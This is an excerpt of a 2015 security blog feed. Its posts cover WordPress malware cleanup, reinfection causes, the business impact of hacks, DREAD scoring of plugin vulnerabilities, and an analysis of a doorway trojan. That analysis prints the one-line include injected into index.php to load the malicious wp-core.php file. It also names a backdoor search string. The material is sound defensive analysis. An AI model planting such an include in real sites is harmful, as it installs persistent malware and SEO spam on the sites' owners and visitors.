<p>In case of this attack, you may find backdoors that I showed in the screenshot for the backdoor section above in some random files. They may be core WordPress files or third-party plugin files. Try searching for &#8220;<strong>passssword</strong>&#8221; (note 4 s). We can also see that most compromised sites are using <a href="http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html">old vulnerable versions of the Slider Revolution</a> (RevSlider) plugin. <a href="http://www.themepunch.com/home/plugin-update-information/">Update it</a> ASAP, even if it&#8217;s a part of a theme! Update all other themes and plugins too.</p>
<p>Note, we can see that once hackers break into a web site, they infect the <strong>nav-menu.php</strong> files in all the sites that share the same hosting account (they don&#8217;t have to have the RevSlider plugin). Moreover, not only WordPress sites can be infected this way. We also see that the attackers inject the same code into the <strong>defines.php</strong> file of <strong>Joomla!</strong> websites, e.g: <em>includes/defines.php</em>, <em>administrator/includes/defines.php</em></p>
<p><span style="line-height: 1.5;">Once you remove malware and update software, make sure to change all passwords. You might also want to check if hackers created additional WordPress admin users as suggested in <a href="http://blog.0x3a.com/post/114659871819/thousands-of-compromised-wordpress-websites">this post</a>. I can&#8217;t confirm it always happens, but if a site uses old versions of a plugin that has been actively exploited for more than 6 months now, then the chances are it&#8217;s not the first time it has been hacked and it may be affected by multiple unrelated attacks.<br />
</span></p>
<p><span style="line-height: 1.5;">For additional pro-active protection we recommend using a </span><a style="line-height: 1.5;" href="http://sucuri.net/website-firewall/">website firewall</a><span style="line-height: 1.5;">.If you&#8217;re currently infected, and need help, you can learn more about our <a href="http://sucuri.net/website-antivirus/malware-removal">Website Malware Removal Services. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/pseudo-darkleech-server-root-infection.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Why Website Reinfections Happen</title>
		<link>http://blog.sucuri.net/2015/03/why-website-reinfections-happen.html</link>
		<comments>http://blog.sucuri.net/2015/03/why-website-reinfections-happen.html#comments</comments>
		<pubDate>Tue, 24 Mar 2015 04:38:52 +0000</pubDate>
		<dc:creator><![CDATA[Valentin]]></dc:creator>
				<category><![CDATA[Learn]]></category>
		<category><![CDATA[Website Security]]></category>
		<category><![CDATA[bad habits]]></category>
		<category><![CDATA[best practices]]></category>
		<category><![CDATA[reinfection]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12120</guid>
		<description><![CDATA[I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It&#8217;s this idea that regardless of you are you must always<a class="more-link" href="http://blog.sucuri.net/2015/03/why-website-reinfections-happen.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/why-does-your-website-keep-getting-reinfected.jpg" alt="why-does-your-website-keep-getting-reinfected" width="780" height="416" class="aligncenter size-full wp-image-12206" /></p>
<p>I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It&#8217;s this idea that regardless of you are you must always know the foundation that makes this company work. After a month of this training, I made some very interesting observations through my interactions with some of our clients and felt some might find it interesting. This might be new to some, and not so new to others, but for me it was fascinating and worth a share. </p>
<p>I will note that I was like many of you a month ago, I operated my own website, and still do, and came to know of Sucuri because my own website had been hacked. Such is the circle of life that I now work at this fascinating place. Here are some of my observations and I hope they help someone. </p>
<h5>1. Passwords</h5>
<p>It is important to understand that whenever you create a website, even before you actually register your domain name, one thing should be at the top of your list: <a href="http://blog.sucuri.net/2015/02/the-dynamics-of-passwords.html" title="The Dynamics of Passwords" target="_blank">create a good password</a>. Our friends at <a href="http://wpengine.com/unmasked/">WPEngine put together a fascinating post unmasking the psychology behind passwords</a>, if you have time, give it a once over. On that note, always use correctly generated passwords. Where?</p>
<p><strong>Short answer: </strong>everywhere passwords are required. </p>
<p><strong>Longer explanation:</strong></p>
<ul>
<li><strong>On your registrar account.</strong> We see many examples of domains being DNS-spoofed because the domain registrar account was hacked. (See the recent Lenevo.com case).</li>
<li><strong>On your website hosting account.</strong> There have been multiple instances where existing customers returning for another cleanup, on the same website, were still using the old credentials they had when they initially asked us to help them. Despite the fact that <a href="http://sucuri.net/kb/after-the-cleanup" title="Post Cleanup Steps" target="_blank">we always tell customers</a> to change their passwords after a cleanup, many don&#8217;t.</li>
<li><strong>On your computer.</strong> Make sure you always set up your computer to use a username and password to log-on, never leave it unlocked when you step away from it and make sure you&#8217;re employing best practices with your passwords. Hackers are not always trying to directly connect to your website. Instead, they will try to use possibly damaged installations of softwares like FileZilla or Total Commander, to steal your FTP credentials and log into your website with the correct username and password, stolen from your computer.</li>
</ul>
<p>Remember, employ Complex Long and Unique passwords at all time, do not use the same password across all your online profiles and most important, if you&#8217;ve been infected and you get help getting it clean, update all passwords the minute it&#8217;s done. </p>
<h5>2. Shared Environments</h5>
<p>One of the biggest contributing factors to reinfections are shared environments. We&#8217;re not talking to shared versus dedicated hosting, instead accounts in which have multiple installations within them. Imagine a hosting account in which you install 10, 20, maybe 100 different CMS applications. These are considered soup kitchen servers, and they are ripe to be exploited. </p>
<p>What often happens is we forget what we&#8217;ve installed and in the process leave the sites to their own demise. Over time, they become out of date and some, unfortunately, fall susceptible to a weakness like a vulnerability. As are the things on the web, at some point one of those weaknesses is identified via the relentless bots crawling the web. Once identified, they get exploited. Once in the environment, via a method we call lead frogging (also known as cross-site contamination) they infect all neighboring sites, inevitably affecting your good website. </p>
<p>Where this plays a role is that often a website owner will clean the good website, assuming that is where the weakness is. Only to find out, after much troubleshooting that the weakness is actually in a neighboring site &#8211; leading to continuous reinfection cases. </p>
<p>Lesson? </p>
<p>Stop operating soup kitchen servers, if one website is infected on the server, assume they all are and get them all cleaned. If you can&#8217;t, then it might be time to do some spring cleaning. </p>
<h5>3. Do Not Assume You Cannot Be a Target</h5>
<p>If you&#8217;re thinking that your website is just a personal blog, school project, presentation website or small business services, and by definition that is not a target for hackers, you are wrong. I encourage you to read our recent post on <a href="http://blog.sucuri.net/2015/02/why-websites-get-hacked.html">Why Website Get Hacked</a> as it&#8217;ll help provide perspective. </p>
<p>Most attacks are not targeted attacks. You&#8217;re just a part of a script being targeted upon a large number of websites and servers, where the hackers are looking to find vulnerabilities and they&#8217;ll strike. Most of the times this is done with automated tools. They can find and infect your website in minutes.</p>
<p>Being hosted on the server where a targeted website is also hosted will cause problems to all websites hosted there, if the server is not correctly patched and secured/hardened.</p>
<h5>4. Complex Structures</h5>
<p>I can think of one case where I imagined the client having gone through this process:</p>
<ul>
<li>Setup a Joomla CMS to power the main website.</li>
<li>Create a<strong> WordPress website inside the Joomla folder,</strong> let&#8217;s call it ./wiki/ because he found a great wiki theme for WordPress and thought he would use it for that.</li>
<li>Add a subdomain subdomain1.maindomain.com and <strong>use it as a backup folder</strong> for main site.</li>
</ul>
<p>Now, we already see three possible problems due to the different types of platforms being used. The time and effort required to maintain this type of configuration is very time consuming, be sure to account for this when deploying your configuration.</p>
<p>It&#8217;s easy if you&#8217;re not very technical, to lose track of which files belong where, which CMS is up-to-date and which isn&#8217;t. Not all CMS applications are treated equal. </p>
<h5>5. Learn the Basics of Your CMS</h5>
<p>To avoid the mess above, start by learning the <strong>structure and names of the core files </strong>that come with the CMS of your choice.</p>
<p>What does the original archive downloaded from the platforms website contain? Visualize the files, their names and extensions. </p>
<p>Let&#8217;s look at WordPress for instance, we all love and use it, right? This is what a <strong>clean WordPress install</strong> folder looks like, when seen via my FTP client:</p>
<div id="attachment_12121" style="width: 430px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/wp-content/uploads/2015/03/val-post-files.jpg" rel="lightbox"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/val-post-files.jpg" alt="Core WordPress Files viewed in FTP program" width="420" height="569" class="size-full wp-image-12121" /></a><p class="wp-caption-text">Core WordPress Files viewed in FTP program</p></div>
<p>The wp-config.php file contains the information enabling WordPress to connect to the server and the database to store content and data. Attackers will create additional files or folders in your website, having similar names as the clean WordPress files. So paying attention to them will help you determine which files could potentially have been added by the intruder. Remember, wp-config.php is not the same as wp-configs.exe or config-wp.php.</p>
<p>Never feel inadequate or inferior for not knowing your way around a server or website dashboard. Always ask for professional <a href="http://sucuri.net/website-antivirus/malware-removal" title="Website Malware Removal and Protection" target="_blank">help</a> if you need it, contrary to popular belief, website security is not a Do It Yourself (DIY) project. </p>
<h5>6. Backups</h5>
<p>Never store backups in the publicly accessible folder. Never have backups on the same physical location as the main website. Something will always happen and both the website and the backups folder you rely on could be deleted.</p>
<p>Make sure you are securely saving your website data on protected backup services, which will allow for easy data-retrieval in the event of an attack. There are many services available, we have one for existing clients, but you can find a number of them on the market. The biggest mistake we see are website owners never employing a backup service, when an infection is so bad that the attacker deletes existing code, it&#8217;s impossible to recover without a good backup. </p>
<h4>My Website Security Journey Continues</h4>
<p>I hope these 6 tips help someone, they may feel foreign, but don&#8217;t worry, there is plenty of help available. Remember, there is no such thing as a 100% security solution. The difference is like getting sick and visiting the doctor. You can follow the prescribed treatment and take the pills, or say, &#8220;I don&#8217;t care about what this doctor thinks&#8221; and continue to get sick again and again.</p>
<p>The same thing happens to websites. Untreated, uncleaned, not &#8220;medicated&#8221; correctly, can lead to the same problems reappearing. So be on the safe side, learn about your mistakes, <strong>correct your security habits, keep your system updated, use correctly configured security services</strong> and you&#8217;ll reduce your overall risk, helping you avoid becoming a recurring victim.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/why-website-reinfections-happen.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The Impacts of  a Hacked Website</title>
		<link>http://blog.sucuri.net/2015/03/the-impacts-of-a-hacked-website.html</link>
		<comments>http://blog.sucuri.net/2015/03/the-impacts-of-a-hacked-website.html#comments</comments>
		<pubDate>Thu, 19 Mar 2015 13:15:37 +0000</pubDate>
		<dc:creator><![CDATA[Tony Perez]]></dc:creator>
				<category><![CDATA[Learn]]></category>
		<category><![CDATA[Website Hacked]]></category>
		<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12177</guid>
		<description><![CDATA[Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failing<a class="more-link" href="http://blog.sucuri.net/2015/03/the-impacts-of-a-hacked-website.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>Today, with the  proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. </p>
<p>We are failing each other, we are not setting ourselves up for success. We are learning the hard way, what large organizations already learned &#8211; <strong>being online is a responsibility and will eventually cost you something</strong>.</p>
<p>I recently shared a post talking to the <a href="http://blog.sucuri.net/2015/02/why-websites-get-hacked.html">motivations behind hacks</a>. This post was important as it helped provide context and I encourage you to spend some time digesting the information. What it fails to do however, is what I want to focus on in this post. </p>
<p>What are the impacts of these hacks to your website? To your business?</p>
<h4>The Effects of a Hacked Website</h4>
<p>If you are a large organization, maybe you can quickly understand the impacts of a hack. Say you&#8217;re a Facebook? What would be the value for a hacker? I&#8217;d argue a couple of things come to mind quickly &#8211; you have what is known as Personal Identifiable Information (PII) &#8211; always a good thing, and you have the ability to abuse the largest network in the world and affect millions of users world wide. There are obviously a number of other motivations, but the point is the same. The objective[s] is clear and Facebook knows it, and so they invest heavily in its security. The impacts of such a breach could be devastating, think loss in ad revenue, loss in user adoption, etc&#8230; This is all common sense, right? It all just makes sense, but how does that translate to the rest of the online world? The 99% of us that don&#8217;t own Facebook like properties?</p>
<p>When I speak to website owners, there is often a common trend with the responses I get:</p>
<blockquote><p>
I don&#8217;t sell anything or store any information, my website is fine.
</p></blockquote>
<p>or </p>
<blockquote><p>
It&#8217;s just a basic little site, with static content.
</p></blockquote>
<p>This is not their fault. To a certain extent, they do have a point. When you think about it rationally, why would someone bother? Fortunately, in my last post I explained why they would. In those one though let&#8217;s talk about 4 potential impacts after a hack. Things you might be aware of, but honestly possibly things you haven&#8217;t given much thought to. </p>
<h6>1. Be Mindful Of your Audience</h6>
<p>Maybe you write about puppies, or maybe have a website to provide your clients the assurances that you are real. Whatever the reason, something has driven you to publish something that you feel to be of some interest to someone, and you&#8217;re likely right.</p>
<p>In doing so, you have identified a potential audience, and as it is on the web, that audience will at some point find your website. Whether you are a local gym posting your gym hours, or maybe a local restaurant showing today&#8217;s specials. The subset of people that have found their way to your website expect and demand a safe experience, even if they&#8217;ve never uttered the words. </p>
<p>The easiest way to digest this point is to think of yourself. Think of the websites you might spend your days visiting. Now try to fathom your feelings if while visiting a website you lost your life savings. Try to think of what you would feel like if someone stole your identity. </p>
<p>Should we worry about giving your visitors a safe online experience?</p>
<h6>2. Google Does Not Discriminate</h6>
<p>Contrary to popular belief, Google does not discriminate. Even if you do not sell, you are likely trying to achieve something. If you&#8217;re not, then why are you online? Whether it&#8217;s establishing a voice, sharing an opinion, or having a presence. What you are almost always worried about is something known as Search Engine Optimization (SEO), more importantly how you rank on the Search Engine Result Pages (SERP). </p>
<blockquote><p>Safe Browsing shows people more than 5 million warnings per day for all sorts of malicious sites and unwanted software, and discovers more than 50,000 malware sites and more than 90,000 phishing sites every month. &#8211; <a href="http://googleblog.blogspot.com/2015/03/protecting-people-across-web-with.html">Google</a></p></blockquote>
<p>What if I told you that you could lose all the hard work you put in to gain that SEO ranking in minutes? What if I told you that after a blacklist it could take you months to regain your position on these SERPs? What if I told you that a Google Blacklist has the potential to kill almost 95%, if not more, of the traffic to your website?</p>
<h6>3. Something Known as Brand Reputation</h6>
<p>Regardless of your business, you have a brand. Whether you realize it or not, and regardless of the size of your audience, trust is an important piece of the puzzle. Many take this for granted, but it&#8217;s critical to the success of many businesses. </p>
<p>It can take years to build, and minutes to lose. A hacked website is notorious for destroying trust. Whether its a data breach or a drive by download that infects the visitors desktop. The result of either action, or one of many more nefarious acts, will almost always lead to the same thing &#8211; <strong>a loss of trust in your brand</strong>. </p>
<p>Are you ok if your audience loses trust in your brand? </p>
<h6>4. Hacks Cost You More Than Money<br />
<h6>
<p>I think it&#8217;s human nature to think, &#8220;This is not meant for me&#8221; or &#8220;I&#8217;ll just deal with it when it happens.&#8221; I can tell you though, from years of doing this work and countless engagements with website owners, the cost of a hack is always more than you can ever imagine. The response I always get is the same, &#8220;If I only knew it would be this painful.&#8221;</p>
<blockquote><p>
As a species, we are risk adverse when it comes to gains, but risk seeking when it comes to loss… &#8211; Bruce Schneider
</p></blockquote>
<p>When I say cost, it&#8217;s important to note that it goes far beyond money, although that can be crippling as well. </p>
<p>No, instead I am talking about things you will likely never appreciate until you experience it. Things like the emotional toll of not knowing what just happened. Things like the hours you will spend arguing with hosting providers, developers, security professionals; if they would all just understand how important it is to get back online. Things like the fear that you missed something in the clean up process, which only becomes worse if you did and suffer repeated reinfections. Things like the new fear of being online at all, of technology as a whole. All this is exasperated by one simple thought, &#8220;Why didn&#8217;t I take precautions?&#8221; </p>
<p>As surreal as these sound, these are the real costs of a hack. The money is easy to account for, as a business you take that risk; the smaller a business, the more likely you are to take the risk, the larger you are, the more foolish it is to take the risk. It&#8217;s the non-monetary impact that catches everyone off guard. </p>
<p>Are you emotionally and mentally prepared for a hack? Is your business?</p>
<h4>Accounting for Website Security Is Always a Challenge</h4>
<p>When did running a business become so challenging? Trust me, I know the feeling. Everyday I ask myself the same thing. When will the expenses end? Purchase this tool, configure this feature, hire more people. It&#8217;s an endless cycle, yet a necessary one. As business owners it falls on our shoulders to make these decisions. </p>
<p>For me, there is nothing worse than getting caught with my pants down. This is exactly what I hear from our clients. No one ever told me I had to think about my websites security. No one ever told me this could impact my business. </p>
<p>I hope this post helps address those points. Leverage these insights to make a better decision. If you can honestly say that known of the four items mentioned above are of any value to your business, then I encourage you to continue with the status quo. If though, for whatever reason, they resonate, then maybe it&#8217;s a good time to start asking more engaging questions to your technical staff.</p>
<p>A question like, <strong>What do we do for the security of our website?</strong></p>
<p>I&#8217;ll close the point with a note to Developers / Designers. Our clients depend on us as their trusted technologists, it&#8217;s on us to educate and communicate the realities of having an online presence. Let&#8217;s be sure to be doing our part by introducing realistic expectations during the initial engagement process: Yes, the website will require maintenance. Yes, security is something you will be responsible for. Yes, having a website is a responsibility. </p>
<p>&#8211; Your Trusted Security Team</p>
<p>Tony</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/the-impacts-of-a-hacked-website.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Understanding WordPress Plugin Vulnerabilities</title>
		<link>http://blog.sucuri.net/2015/03/understanding-wordpress-plugin-vulnerabilities.html</link>
		<comments>http://blog.sucuri.net/2015/03/understanding-wordpress-plugin-vulnerabilities.html#comments</comments>
		<pubDate>Tue, 17 Mar 2015 17:19:42 +0000</pubDate>
		<dc:creator><![CDATA[Daniel Cid]]></dc:creator>
				<category><![CDATA[Vulnerability Disclosure]]></category>
		<category><![CDATA[WordPress Security]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12157</guid>
		<description><![CDATA[The last 7 days have been very busy with a number of vulnerabilities being disclosed on multiple WordPress plugins. Some of them are minor issues, some are more relevant, while others are what we&#8217;d categorize as noise. How are you supposed to make sense of all this? To help provide some clarity on the influx<a class="more-link" href="http://blog.sucuri.net/2015/03/understanding-wordpress-plugin-vulnerabilities.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>The last 7 days have been very busy with a number of vulnerabilities being disclosed on multiple WordPress plugins. Some of them are minor issues, some are more relevant, while others are what we&#8217;d categorize as noise. How are you supposed to make sense of all this? </p>
<p>To help provide some clarity on the influx of data, we want to provide some insights to help you, the website owner, navigate and understand these vulnerabilities. We will provide a summary and an explanation of the ones that matter and the ones that do not.</p>
<h5>The Impact of Roles (Authentication) in Vulnerabiltiies</h5>
<p>Contrary to popular belief, just because you hear <strong>&#8220;SQL Injection&#8221;</strong>, it doesn&#8217;t mean someone can actually hack your site. The real problem comes in remote and unauthenticated attacks. These can lead to mass compromises; compromised can be mean leveraged to distribute malware, spam and can lead to brand reputation issues like getting blacklisted by Google.</p>
<p>When an attack requires an authenticated user, the severity drops. However, it is not that uncommon for sites to allow subscribers to register. So, any vulnerability that requires a subscriber user can also lead to serious issues.</p>
<p>Once a vulnerability requires a higher role, think authors or editors, the severity and our overall score drops though. The reason this is true is because users with higher roles often have higher permissions and abilities to do things that can sometimes be seen malicious, but are in fact by design. A perfect example of this can be seen in WordPress core. </p>
<p>In core, an administrator is able to inject unfiltered html in posts and pages, and can also execute any command they want via plugins they install. Is this a vulnerability? No, it&#8217;s a feature and it&#8217;s based on one very important element &#8211; <strong>Trust</strong>. The user that is given that role is given permission to do whatever features have been made available, so if that&#8217;s to inject unfiltered html, then the user is expected to do so responsibly. </p>
<p>In security, this is why we place so much emphasis on concepts like <strong>Least Privileged</strong> &#8211; the principle of giving someone the permission they require to do their job, no more, and no less. If they require higher permissions, then give them what they need, for as long as they need it, then reset the role to its original configuration. This however is a topic for another day, but worth understanding as it sets context moving forward. </p>
<h5>Scoring Vulnerabilities on WordPress Plugins</h5>
<p>We like to use the DREAD score when assessing a vulnerability in WordPress Plugins. A question we often get is, why did you not report on this recent release? Or, why did you report on this release? DREAD allows us to take a more objective approach to released, in hopes that we&#8217;ll be able to cut down on the noise and market confusion. </p>
<p>DREAD was developed by Microsoft many years ago and is not that widely used anymore. For us however, we find it to be very useful for web applications, especially when it comes to Content Management System (CMS) disclosures. </p>
<p>DREAD breaks a vulnerability down into 5 categories:</p>
<blockquote><p>
Damage &#8211; How bad would an attack be?<br />
Reproducibility &#8211; How easy is it to reproduce the attack?<br />
Exploitability &#8211; How much work does it take to launch the attack?<br />
Affected users &#8211; How many people will be impacted?<br />
Discoverability &#8211; How easy is it to discover the threat?
</p></blockquote>
<p>Each category gets a score from 0 to 10 and at the end, you sum them all and divide by 5 to get the final value.</p>
<p>How we classify each category is what counts the most in the work we do:</p>
<ol>
<li>Damage &#8211; 0:same as what the role has, 3:Information Leaks, 5:XSS, 8:Authenticated RCE or SQL Injections, 10:Unauthenticated Remote command execution or SQL injections.</li>
<li>Reproducibility &#8211; 0:requires admin, 2:requires editor, 3:requires author, 6:requires subscriber, 10: unauthenticated</li>
<li>Exploitability &#8211;  0:fully manual and takes very long, 3:hard to automate, requires author+, 5:hard to automate, requires login, 8:easy to automate, multiple steps 10:one click on a browser</li>
<li>Affected users &#8211; 0:less than 1k installs, 5:100k+ installs, 10:1m+ installs</li>
<li>Discoverability &#8211; 0:you have to attempt an exploit to see if it works or not, 3:you have to guess and it requires a log in,6:you have to guess but can attack remotely, 10:plugin announces that it is installed. </li>
</ol>
<p>With these ranges in mind, let&#8217;s see how each vulnerability stacks up.</p>
<h5>Gravity Forms: SQL Injection / Severity: Low</h5>
<p>The gravity forms team just released an update fixing a SQL Injection (SQLi) on the &#8220;sort&#8221; argument on their edit page. Only an authenticated admin or editor can actually reach that part of the code, so we consider it a low severity vulnerability. Editors and admins can do so much already, that only trusted people should have this role. If the admin user is performing a SQLi attack, they are likely conducting a number of other attacks and SQLi is probably the least of your concerns.</p>
<p>It can be used on targeted attacks, due to the lack of nounces, but we will not see any major issues coming out of it.</p>
<p>Looking at DREAD: </p>
<pre>
D: 8
R: 2
E: 3
A: 7 (since it is a paid plugin, we don't know exactly the number of installs)
D: 3
</pre>
<p><strong>The final score is 4 &#8211; Low</strong> (8 + 2 + 3 + 7 + 3 / 5) </p>
<h5>Pods Plugin: SQL Injection  / Severity: Low</h5>
<p>The Pods vulnerability is actually very similar to the GravityForms and the WordPress SEO ones. Looking at the DREAD score:</p>
<pre>
D: 8
R: 2
E: 3
A: 2
D: 5
</pre>
<p><b>Final score is 3 &#8211; Very Low</b> (8 + 2 + 3 + 2 + 3 / 5)</p>
<h5>MainWP-Child: Password Bypass / Severity: High</h5>
<p>The MainWP vulnerability was found by our team and we gave it a high severity. The reason we did so is that it was very easy to exploit (unauthenticated) and allows anyone to get admin access to the vulnerable site. </p>
<pre>
D: 10
R: 10
E: 9
A: 5
D: 6
</pre>
<p><b>Final score is: 8 (high)</b> (10 + 10 + 9 + 5 + 6 / 5)</p>
<h5>WooCommerce: SQL Injection / Severity: Very Low</h5>
<p>The WooCommerce vulnerability is interesting, since it requires an admin or shop manager in order to exploit it. We would not treat is a vulnerability, but as a bug, since it does not allow more damage than what the role (admin) actually can cause.</p>
<pre>
D: 0 (same damage as the role itself can cause)
R: 0 (requires admin)
E: 1
A: 10 (1m+ installs)
D: 3
</pre>
<p><b>Final score is: 2 (very low)</b> (0 + 0 + 1 + 10 + 3 / 5)</p>
<h5>WordPress SEO: SQL injection / Severity: Low</h5>
<p>The WordPress SEO vulnerability got a lot of media coverage due to its popularity. Was it valid? Let&#8217;s look at the scores again:</p>
<pre>
D: 8
R: 3
E: 3
A: 10
D: 3
</pre>
<p><b>Final score is: 5 (Low)</b> (8 + 3 + 3 + 10 + 3 / 5)</p>
<h5>Judging Vulnerabilities</h5>
<p>Judging vulnerabilities and its impacts is always very hard. A low severity score on DREAD, doesn&#8217;t mean it can&#8217;t be used on a targeted attack against your site. It doesn&#8217;t mean you do not have to patch it and keep your site updated. </p>
<p>That&#8217;s why we always make sure our <a href="https://sucuri.net/website-firewall/">Website Firewall (WAF)</a> is protecting against all of them. For every new vulnerability disclosed, our research team invests the time to test, verify and validate their impacts and ensures that our protection mechanisms are effectively patching and protecting or users. </p>
<p>When looking at the internet as a whole, low severity vulnerabilities will have a small impact overall and requires less marketing to get to the ear of the users. It&#8217;s also difficult to decipher the amount of noise being disclosed, we hope this helps provide some guidance into how to make sense of all the information you might be reading. </p>
<p>&#8211; Your Trusted Security Team</p>
<p>Daniel</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/understanding-wordpress-plugin-vulnerabilities.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Inverted WordPress Trojan</title>
		<link>http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html</link>
		<comments>http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html#comments</comments>
		<pubDate>Wed, 11 Mar 2015 18:40:16 +0000</pubDate>
		<dc:creator><![CDATA[Denis Sinegubko]]></dc:creator>
				<category><![CDATA[Website Malware]]></category>
		<category><![CDATA[WordPress Security]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12109</guid>
		<description><![CDATA[Trojan (or trojan horse) is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan model<a class="more-link" href="http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><a href="http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29" target="_blank"> Trojan (or trojan horse)</a> is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (<a href="http://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html" target="_blank">usually pirated</a>) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan model is easy to understand: package malware inside something useful and have webmasters install it themselves.</p>
<p>This week I came across something that I can call an inverted trojan — malware (installed without webmaster consent) that added useful features to WordPress.<br />
<span id="more-12109"></span></p>
<p>This is a typical Black Hat SEO hack that has affected lots of WordPress site lately. It creates doorways for pharmaceutical keywords and redirects visitors that come search engines to third-party sites. But the way the doorway code work is quite interesting.</p>
<p>The main malicious file is <strong>wp-core.php</strong> in the site root directory. To use it, hackers inject the following line into <strong>index.php</strong></p>
<pre><code>
if ( file_exists( 'wp-core.php' ) ){ require_once( 'wp-core.php' ); }
</code></pre>
<p>Such index.php injections look suspicious and tell us that wp-core.php was not installed naturally since this breaks basic WordPress conventions.</p>
<p>Lets take a look inside this <strong>wp-core.php</strong></p>
<h3>Brute-force protection in wp-core..php</h3>
<p>The file has <strong>500+</strong> lines of code and its beginning tells us that it’s a part of the <strong>“WordPress-Protection”</strong> package that “<em>Creates the bruteforce protection for WordPress CMS. Makes 302-redirect to protect SE juice</em>” and tells us that in order to use it it should be loaded directly first (as a “WordPress bootstrap”).</p>
<div id="attachment_12102" class="wp-caption align center"><img class="size-full wp-image-12102" width="586" height="291" alt="wp-core.php" src="http://blog.sucuri.net/wp-content/uploads/2015/03/wp-core.jpg"></img>
<p class="wp-caption-text">wp-core.php</p>
</div>
<p>I personally don’t buy it, but lets check what it does to be sure.</p>
<p>In the middle of the file, I found the <strong>“bootstrap”</strong> code.</p>
<p>First it injects “Bruteforce protection” code into <strong>wp-login.php</strong>.</p>
<div id="attachment_12103" class="wp-caption align center"><img class="size-full wp-image-# " width="586" height="356" alt="‘Bruteforce protection’ injection" src="http://blog.sucuri.net/wp-content/uploads/2015/03/bruteforce-protection.gif"></img>
<p class="wp-caption-text">‘Bruteforce Protection’ Injection</p>
</div>
<p>It adds the “onsubmit” handler to the login form that sets the “<strong>antibot_ajax’</strong>” cookie. Then it also adds a code that checks if that cookie is set, and if not, doesn’t allow to log in. This looks like real protection against bots that don’t execute JavaScript. It’s not bullet-proof, but not malicious either.</p>
<p>Then we see the <strong>“Auth 2nd level”</strong> code:</p>
<div id="attachment_12104" class="wp-caption align center"><img class="size-full wp-image-12104" width="586" height="594" alt="‘Auth 2nd level’ injection" src="http://blog.sucuri.net/wp-content/uploads/2015/03/auth-2nd-level.gif"></img>
<p class="wp-caption-text">‘Auth 2nd level’ injection</p>
</div>
<p>This one looks more suspicious since it injects an encrypted code (again, into <strong>wp-login.php</strong>). However, once un-encrypted, the code appears to be benign. It does exactly what the comment says: it’s the second step of authentication. If the login/password pair is valid, it retrieves the user email from the WP database, replaces all the characters starting from the 3rd and up to the “@” with asterisks and asks to verify this email, providing it in full unmasked form:</p>
<div id="attachment_12105" class="wp-caption align center"><img class="size-full wp-image-12105" width="376" height="375" alt="Added Email Confirmation Step" src="http://blog.sucuri.net/wp-content/uploads/2015/03/email-confirmation.png"></img>
<p class="wp-caption-text">Added Email Confirmation Step</p>
</div>
<p>So even if a bot supports JavaScript and cookies, and passed the first layer of the added anti-bot protection it will fail on this second step since it needs to know the user’s email address. The same is true for humans who might have guessed/stolen the WordPress password — they won’t be able to log in without knowing the email address.</p>
<p>For users that confirmed the email address, this additional step sets the <strong>WP_FLV_EMAIL_CONFIRMED</strong> cookie for <strong>10,000</strong> days so that they don’t have to confirm the email every time.</p>
<p>The final “bootstrap” part injects the code that includes <strong>wp-core.php</strong> into <strong>index.php</strong> (you can see it at the beginning of the post). It makes sure the “bruteforce protection” is used all the time and restores it if its code was removed from <strong>wp-login.php</strong>.</p>
<div id="attachment_12106" class="wp-caption align center"><img class="size-full wp-image-12106" width="386" height="394" alt="‘Patching’ index.php" src="http://blog.sucuri.net/wp-content/uploads/2015/03/index-php-injection.gif"></img>
<p class="wp-caption-text">‘Patching’ Index.php</p>
</div>
<p>So if we forget the unconventional way to add functionality to WordPress, this code indeed adds a real brute-force protection mechanism. Of course it’s not perfect and won’t help against a targeted attack, especially if the attacker knows the protection method. But it certainly will make WordPress more secure and protect against at least <strong>95%</strong> of real-world automated brute-force attacks.</p>
